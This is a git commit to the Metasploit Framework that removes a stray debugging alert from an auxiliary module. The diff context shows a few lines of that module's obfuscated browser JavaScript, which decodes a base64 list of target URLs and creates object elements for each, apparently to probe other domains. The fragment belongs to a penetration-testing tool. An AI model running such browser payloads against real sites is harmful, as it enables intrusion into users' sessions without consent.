Remove stray alert() for debugging.

bug/bundler_fix
Joe Vennix 2014-10-30 10:52:06 -05:00
parent 88040fbce0
commit 0ad9f95806
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
1 changed files with 0 additions and 1 deletions

View File

@ -72,7 +72,6 @@ class Metasploit3 < Msf::Auxiliary
domains = datastore['TARGET_URLS'].split(',') domains = datastore['TARGET_URLS'].split(',')
script = js_obfuscate <<-EOS script = js_obfuscate <<-EOS
window.onerror=alert;
var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}")); var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));
targets.forEach(function(target, i){ targets.forEach(function(target, i){
var obj = document.createElement('object'); var obj = document.createElement('object');